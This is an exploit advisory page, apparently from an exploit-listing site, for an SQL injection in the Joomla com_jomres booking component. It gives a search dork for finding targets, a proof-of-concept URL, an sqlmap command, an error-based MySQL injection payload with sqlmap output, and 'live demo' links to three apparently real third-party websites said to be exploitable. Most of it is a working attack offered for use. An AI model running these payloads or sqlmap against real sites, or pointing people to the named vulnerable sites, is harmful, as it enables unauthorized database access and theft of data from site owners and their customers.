Joomla com_ jomres SQL injection Vulnerability

2016.07.13
Credit: xBADGIRL21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: index.php?option=com_ jomres "property_uid"

###################### # Exploit Title : Joomla com_ jomres SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : index.php?option=com_ jomres "property_uid" # Software link : https://www.jomres.net/files/jomres_joomla_component_installer.zip # Vendor Homepage : https://www.jomres.net # Tested on: [ Kali Linux 2.0 ] # skype:xbadgirl21 # Date: 2016/07/12 # video Proof : https://youtu.be/BjTHnDZsX_s ###################### # [+] DESCRIPTION : ###################### # [+] Jomres is the most powerful, commission-free Joomla and WordPress online booking system and property management solution # [+] used by thousands of businesses worldwide # [+] to better manage their properties, reservations, payments and increase sales # [+] and an SQL injection been Detected in this Joomla components jomres ###################### # [+] Poc : ###################### # [property_uid] Get Parameter Vulnerable To SQLi # http(s)://<host>/<joomla-path>/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82' ###################### # [+] SQLmap Poc : ###################### # http(s)://<host>/<joomla-path>/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82'&tmpl=kiss&lang=ro" -p property_uid --dbs # Parameter: property_uid (GET) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause # Payload: option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82' AND (SELECT 8845 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT #(ELT(8845=8845,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DiLY&tmpl=kiss&lang=ro # --- # [15:29:04] [INFO] the back-end DBMS is MySQL # web application technology: PHP 5.4.45, Apache # back-end DBMS: MySQL 5.0 # [15:29:04] [INFO] fetching current database ###################### # [+] Live Demo : ###################### # https://turo.ro/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103%27&property_uid=82%27&tmpl=kiss&lang=ro # http://www.apartamentosviella.com/index.php?option=com_jomres&Itemid=160&lang=es&task=listProperties&propertylist_layout=mapview # http://www.andorraski.be/index.php?option=com_jomres&Itemid=140&lang=nl&task=dobooking&selectedProperty=50 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere #######################

References:

https://youtu.be/BjTHnDZsX_s


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top